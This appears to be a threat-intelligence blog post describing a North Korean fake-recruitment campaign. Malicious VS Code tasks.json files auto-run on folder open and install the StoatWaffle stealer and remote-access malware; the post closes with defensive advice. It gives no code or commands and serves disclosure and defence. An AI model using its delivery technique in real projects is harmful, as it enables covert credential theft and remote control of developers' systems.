When the Interview Runs Code: The Developer Who Let Malware In
- Javier Conejo del Cerro
- 24 mar
- 3 min de lectura
North Korean threat actors behind the Contagious Interview campaign have evolved their tradecraft by embedding malware delivery directly into developer workflows. By abusing Visual Studio Code auto-run tasks, they transform trusted coding environments into execution vectors, deploying the StoatWaffle malware family without requiring explicit user action. This marks a critical shift: the attack no longer relies on convincing users to run code manually—it executes the moment trust is granted to the project itself.
Phase 1: Deception & Delivery
The attack begins with highly convincing fake recruitment processes, often initiated through LinkedIn. Targets—typically senior developers, founders, and CTOs in cryptocurrency and Web3 sectors—are invited to participate in technical interviews that mirror legitimate hiring workflows.
Victims are provided with coding exercises hosted on platforms like GitHub, GitLab, or Bitbucket. These repositories appear authentic, containing structured projects and realistic codebases. However, embedded within them is a malicious configuration file: tasks.json.
By exploiting the “runOn: folderOpen” feature, attackers ensure that the moment the developer opens the project in VS Code, the malicious task is executed automatically—without requiring any further interaction.
Phase 2: Automatic Execution & Environment Setup
Once triggered, the malicious task initiates a download from external infrastructure, initially hosted on Vercel and later evolving to GitHub Gist to evade detection.
The payload performs environment checks, beginning with verifying the presence of Node.js. If Node.js is not installed, the malware downloads it from the official source and installs it silently, ensuring compatibility across operating systems.
A staged downloader is then launched, which periodically communicates with a command-and-control (C2) server to retrieve additional payloads. Each stage fetches and executes further Node.js code, creating a modular and resilient infection chain.
Phase 3: Payload Deployment — StoatWaffle
At the core of the attack is StoatWaffle, a modular malware framework built in Node.js. It deploys two primary components:
Stealer Module: Extracts browser credentials and extension data from Chromium-based browsers and Firefox. On macOS systems, it additionally targets the iCloud Keychain database, significantly increasing the value of the stolen data.
RAT Module: Establishes persistent communication with the C2 server, enabling remote command execution. Capabilities include directory enumeration, file upload/download, recursive searches, execution of Node.js and shell commands, and process termination.
This combination allows attackers to fully control the compromised system while harvesting high-value credentials and sensitive data.
Phase 4: Expansion, Ecosystem Abuse & Persistence
The campaign extends beyond VS Code projects into the broader open-source ecosystem. Threat actors distribute malicious npm packages (e.g., PylangGhost), compromise GitHub repositories (e.g., Neutralinojs), and inject obfuscated JavaScript payloads to deliver additional malware such as BeaverTail, InvisibleFerret, and FlexibleFerret.
Newer variants have shifted infrastructure from Vercel to GitHub Gist, demonstrating rapid adaptation and evasion. Additional attack chains include fake CAPTCHA pages (ClickFix-style) that trick users into executing clipboard-injected commands, maintaining cross-platform effectiveness.
Persistence is maintained through continuous C2 communication and modular payload delivery, while each compromised developer becomes a potential pivot point into corporate infrastructure and cryptocurrency assets.
Measures to Fend Off
Update VS Code to version 1.109+ and ensure task.allowAutomaticTasks is disabled
Audit and restrict execution of tasks.json in untrusted repositories
Avoid opening or executing code from unknown or unverified sources, even in interview contexts
Validate recruitment processes and verify company legitimacy before engaging
Monitor Node.js installations and unexpected execution behavior
Implement behavioral EDR capable of detecting staged downloaders and remote execution
Restrict permissions and apply least privilege on developer environments
Educate developers on social engineering targeting coding workflows
This campaign represents a significant evolution in attacker strategy: the weaponization of developer trust. By embedding malicious execution into tools and workflows that developers inherently rely on, attackers eliminate the need for traditional exploitation techniques.
The use of auto-run tasks in VS Code demonstrates how even legitimate features can become attack vectors when trust boundaries are crossed. Combined with sophisticated social engineering and modular malware design, the result is a highly effective and scalable intrusion method.
The implications are profound. Developers are no longer just users—they are gateways. Their environments connect directly to source code, infrastructure, and financial assets, making them prime targets for advanced threat actors.
This is not just another malware campaign. It is a reminder that in modern development ecosystems, opening a project can be as dangerous as running a file, and sometimes, they are the same thing.
The Hacker News
Comentarios